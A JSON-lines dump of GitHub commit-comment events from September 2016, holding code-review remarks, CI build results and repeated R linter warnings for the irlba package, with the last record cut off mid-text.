{"id":"4574930348","type":"CommitCommentEvent","actor":{"login":"wheatable"},"repo":{"name":"wheatable/AdventureB"},"payload":{"comment":{"id":19056378,"position":null,"line":null,"path":null,"commit_id":"e5a6c1802966699ba0c1a664fd2eb7b3df2d8ec0","created_at":"2016-09-16T16:07:28Z","updated_at":"2016-09-16T16:07:28Z","body":"I also want to test out this comment thing. Will it notify me of comments in slack? I'm sure. Will it save the comments elsewhere? We will see!"}},"created_at":"2016-09-16T16:07:28Z"}
{"id":"4574931406","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056379,"position":34,"line":27,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:07:41Z","updated_at":"2016-09-16T16:07:41Z","body":"Это конструктор по-умолчанию. В нем не передается никаких параметров. Поэтому можно по-умолчанию читать данные из командной строки"}},"created_at":"2016-09-16T16:07:41Z"}
{"id":"4574931849","type":"CommitCommentEvent","actor":{"login":"joshtriplett"},"repo":{"name":"ajdlinux/git-series"},"payload":{"comment":{"id":19056381,"position":null,"line":null,"path":null,"commit_id":"254a021a480cc065dde7021d6d5987f4529302bc","created_at":"2016-09-16T16:07:46Z","updated_at":"2016-09-16T16:07:46Z","body":"Looks good to me.\r\n\r\nI think I might try to get an additional option --rfc added to git format-patch (and then here) for the common case."}},"created_at":"2016-09-16T16:07:46Z"}
{"id":"4574932107","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056383,"position":90,"line":90,"path":"mysql/eventService.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:07:49Z","updated_at":"2016-09-16T16:07:49Z","body":"Since you don't care about anything but the err and return right away, it might be a little cleaner if you write this as:\r\n\r\nif _, err = stmt.Exec(name, description, id); err != nil {\r\n    ...\r\n}"}},"created_at":"2016-09-16T16:07:49Z"}
{"id":"4574932475","type":"CommitCommentEvent","actor":{"login":"SuchkovEgor"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056384,"position":10,"line":10,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:07:53Z","updated_at":"2016-09-16T16:07:53Z","body":"Не очень понял, что это за тип Constructor?"}},"created_at":"2016-09-16T16:07:53Z"}
{"id":"4574933304","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056387,"position":107,"line":107,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T16:08:04Z","updated_at":"2016-09-16T16:08:04Z","body":"ссылкам тоже нужно задавать класс... .socials__link b модификатор .socilas__link--twitter (сделать для всех страниц)"}},"created_at":"2016-09-16T16:08:04Z"}
{"id":"4574933537","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-sgreenholtz"},"payload":{"comment":{"id":19056388,"position":null,"line":null,"path":null,"commit_id":"12648e7079c7ac04f21e86408aa1f2bd77a294a7","created_at":"2016-09-16T16:08:07Z","updated_at":"2016-09-16T16:08:07Z","body":"This appears pretty well tested and it looks like you have the hang of unit testing.  Your coverage was around 73% for line coverage - how might you increase that %?"}},"created_at":"2016-09-16T16:08:07Z"}
{"id":"4574933980","type":"CommitCommentEvent","actor":{"login":"spencergibb"},"repo":{"name":"spring-cloud-samples/config-repo"},"payload":{"comment":{"id":19056389,"position":null,"line":null,"path":null,"commit_id":"fa2f2dec260860d1a647296182bc23f7986210ad","created_at":"2016-09-16T16:08:13Z","updated_at":"2016-09-16T16:08:13Z","body":"no"}},"created_at":"2016-09-16T16:08:13Z"}
{"id":"4574935678","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056391,"position":67,"line":67,"path":"mysql/eventService.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:08:33Z","updated_at":"2016-09-16T16:08:33Z","body":"Probably want to check the error."}},"created_at":"2016-09-16T16:08:33Z"}
{"id":"4574937718","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19056397,"position":null,"line":null,"path":null,"commit_id":"28d7c75c5dadd380e6866a9b78bf76c7f546a52b","created_at":"2016-09-16T16:08:57Z","updated_at":"2016-09-16T16:08:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1032](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13454&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 215, ignored: 3 Build time: 00:10:43\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.rest of installation queue (consecutive installPos) remains Pending upon one package failing to install: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-16T16:08:57Z"}
{"id":"4574938537","type":"CommitCommentEvent","actor":{"login":"lesander"},"repo":{"name":"skillzzjesse/draw"},"payload":{"comment":{"id":19056398,"position":5,"line":35,"path":"index.html","commit_id":"3801fae5a42c5e15f66b880553e9418d3d99a5ca","created_at":"2016-09-16T16:09:09Z","updated_at":"2016-09-16T16:09:09Z","body":"True dat"}},"created_at":"2016-09-16T16:09:09Z"}
{"id":"4574942438","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19056404,"position":null,"line":null,"path":null,"commit_id":"bb113f0b87f92d5c4ef9a3d8436e5a459cbca7a9","created_at":"2016-09-16T16:09:51Z","updated_at":"2016-09-16T16:09:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1031](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13453&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:11:42"}},"created_at":"2016-09-16T16:09:51Z"}
{"id":"4574943156","type":"CommitCommentEvent","actor":{"login":"JacksonHoang"},"repo":{"name":"JacksonHoang/Porpoises-living-for-too-long"},"payload":{"comment":{"id":19056406,"position":null,"line":null,"path":null,"commit_id":"1d024d7d135e4b020cbd9ec6f58b0fee7881da18","created_at":"2016-09-16T16:09:59Z","updated_at":"2016-09-16T16:09:59Z","body":"External link to Question:   http://acmgnyr.org/year2015/problems.shtml"}},"created_at":"2016-09-16T16:09:59Z"}
{"id":"4574944734","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056411,"position":1,"line":1,"path":"handlers/eventHandlers.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:10:18Z","updated_at":"2016-09-16T16:10:18Z","body":"Consider writing package and method comments so that godoc can pick them up.\r\n\r\nhttps://blog.golang.org/godoc-documenting-go-code"}},"created_at":"2016-09-16T16:10:18Z"}
{"id":"4574945277","type":"CommitCommentEvent","actor":{"login":"Scneemanger"},"repo":{"name":"SEEDTEAM/TeleSeed"},"payload":{"comment":{"id":19056414,"position":13,"line":238,"path":"bot/seedbot.lua","commit_id":"57ee3a19952ccf1b20b7ad66bd586db0f7171491","created_at":"2016-09-16T16:10:24Z","updated_at":"2016-09-16T16:10:24Z","body":"Id: 227051954"}},"created_at":"2016-09-16T16:10:24Z"}
{"id":"4574946546","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056415,"position":7,"line":6,"path":"img/README","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T16:10:39Z","updated_at":"2016-09-16T16:10:39Z","body":"Эту строчку удалить во избежание конфликта будущего"}},"created_at":"2016-09-16T16:10:39Z"}
{"id":"4574946550","type":"CommitCommentEvent","actor":{"login":"crandmck"},"repo":{"name":"strongloop/loopback.io"},"payload":{"comment":{"id":19056416,"position":null,"line":null,"path":null,"commit_id":"68694f6c5300351fe0cd381d9be40b4bb1a4da5b","created_at":"2016-09-16T16:10:39Z","updated_at":"2016-09-16T16:10:39Z","body":"Gah! 091138518374e88948ba2442f73ad4c06ae86e30 fixes it for real (I hope).\r\n\r\nMoral of the story is: don't use incremental build when you make a bunch of changes.  Sometimes it doesn't pick up all your changes!"}},"created_at":"2016-09-16T16:10:39Z"}
{"id":"4574947228","type":"CommitCommentEvent","actor":{"login":"ysangkok"},"repo":{"name":"medikoo/modules-webmake"},"payload":{"comment":{"id":19056417,"position":37,"line":417,"path":"README.md","commit_id":"341ed67f0fb218ab5867f31accdb8f0d65189ccb","created_at":"2016-09-16T16:10:47Z","updated_at":"2016-09-16T16:10:47Z","body":"It was released by now..."}},"created_at":"2016-09-16T16:10:47Z"}
{"id":"4574950097","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19056422,"position":null,"line":null,"path":null,"commit_id":"ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46","created_at":"2016-09-16T16:11:17Z","updated_at":"2016-09-16T16:11:17Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:258:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:258:15:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:285:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L285) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:286:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L286) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:320:9:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L320) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:386:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L386) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:387:23:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L387) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:409:26:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L409) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:441:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L441) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:447:17:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L447) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:450:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L450) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:456:32:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L456) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:457:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:477:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L477) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:480:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L480) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:485:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L485) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:486:29:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L486) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:516:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L516) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L523) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:524:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L524) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:529:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L529) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:530:38:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L530) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:550:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L550) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:613:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L613) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:31:19:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/tests/edge.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T16:11:17Z"}
{"id":"4574950717","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19056426,"position":null,"line":null,"path":null,"commit_id":"ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46","created_at":"2016-09-16T16:11:24Z","updated_at":"2016-09-16T16:11:24Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:258:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:258:15:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:285:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L285) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:286:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L286) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- cbind(v$v, RND / norm2(RND))\n                             ^~~~~\n```\n[R/irlba.R:320:9:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L320) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:386:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L386) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​    F <- orthog(F, V[, 1:k])\n         ^~~~~~\n```\n[R/irlba.R:387:23:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L387) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    V[, k + 1] <- F / norm2(F)\n                      ^~~~~\n```\n[R/irlba.R:409:26:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L409) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      V[, 1] <- V[, 1] / norm2(V[, 1])\n                         ^~~~~\n```\n[R/irlba.R:441:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L441) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​      W[, j_w] <- W[, j_w] - ds * drop(cross(dv, VJ)) * du\n                                       ^~~~~\n```\n[R/irlba.R:447:17:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L447) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      W[, j] <- orthog (W[, j, drop=FALSE], W[, 1:(j - 1), drop=FALSE])\n                ^~~~~~\n```\n[R/irlba.R:450:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L450) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    S <- norm2(W[, j_w, drop=FALSE])\n         ^~~~~\n```\n[R/irlba.R:456:32:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L456) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      if (w_dim > 1) W[, j] <- orthog(W[, j], W[, 1:(j - 1)])\n                               ^~~~~~\n```\n[R/irlba.R:457:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L457) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      W[, j_w] <- W[, j_w] / norm2(W[, j_w])\n                             ^~~~~\n```\n[R/irlba.R:477:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L477) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      F <- orthog(F, V[, 1:j, drop=FALSE])\n           ^~~~~~\n```\n[R/irlba.R:480:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L480) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        R <- norm2(F)\n             ^~~~~\n```\n[R/irlba.R:485:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L485) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          F <- orthog(F, V[, 1:j, drop=FALSE])\n               ^~~~~~\n```\n[R/irlba.R:486:29:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L486) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          V[, j + 1] <- F / norm2(F)\n                            ^~~~~\n```\n[R/irlba.R:516:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L516) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] - ds * drop(cross(dv, VJP1)) * du\n                                               ^~~~~\n```\n[R/irlba.R:523:48:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L523) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​        if (reorth && w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                               ^~~~~~\n```\n[R/irlba.R:524:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L524) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​        S <- norm2(W[, jp1_w])\n             ^~~~~\n```\n[R/irlba.R:529:40:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L529) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​          if (w_dim > 1) W[, j + 1] <- orthog(W[, j + 1], W[, 1:j])\n                                       ^~~~~~\n```\n[R/irlba.R:530:38:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L530) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​          W[, jp1_w] <- W[, jp1_w] / norm2(W[, jp1_w])\n                                     ^~~~~\n```\n[R/irlba.R:550:12:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L550) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​    R_F <- norm2(F)\n           ^~~~~\n```\n[R/irlba.R:613:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L613) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[R/prcomp.R:84:16:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/prcomp.R#L84) *warning:* **no visible binding for global variable ‘irlba’**\n```r\n​  s <- do.call(irlba, args=args)\n               ^~~~~\n```\n[R/utility.R:19:13:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/utility.R#L19) *warning:* **no visible global function definition for ‘cross’, Did you mean 'class'?**\n```r\n​  drop(sqrt(cross(x)))\n            ^~~~~\n```\n[tests/edge.R:31:19:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/tests/edge.R#L31) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```"}},"created_at":"2016-09-16T16:11:24Z"}
{"id":"4574952322","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19056431,"position":null,"line":null,"path":null,"commit_id":"ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46","created_at":"2016-09-16T16:11:43Z","updated_at":"2016-09-16T16:11:43Z","body":"[R/eigen.R:57:10:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L57) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​    L <- irlba(x, n, ...)\n         ^~~~~\n```\n[R/eigen.R:60:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L60) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, ...)\n       ^~~~~\n```\n[R/eigen.R:68:8:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/eigen.R#L68) *warning:* **no visible global function definition for ‘irlba’**\n```r\n​  L <- irlba(x, n, shift=shift, ...)\n       ^~~~~\n```\n[R/irlba.R:258:5:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *warning:* **local variable ‘algorithm’ assigned but may not be used**\n```r\n​    algorithm = \"svd\"\n    ^~~~~~~~~\n```\n[R/irlba.R:258:15:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L258) *style:* **Use <-, not =, for assignment.**\n```r\n​    algorithm = \"svd\"\n              ^\n```\n[R/irlba.R:285:14:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L285) *warning:* **no visible global function definition for ‘orthog’**\n```r\n​      RND <- orthog(RND, v$v)\n             ^~~~~~\n```\n[R/irlba.R:286:30:](https://github.com/bwlewis/irlba/blob/ba7885a6a63c19c6fcd89cf4eaf5267fae72eb46/R/irlba.R#L286) *warning:* **no visible global function definition for ‘norm2’, Did you mean 'norm'?**\n```r\n​      RV <- 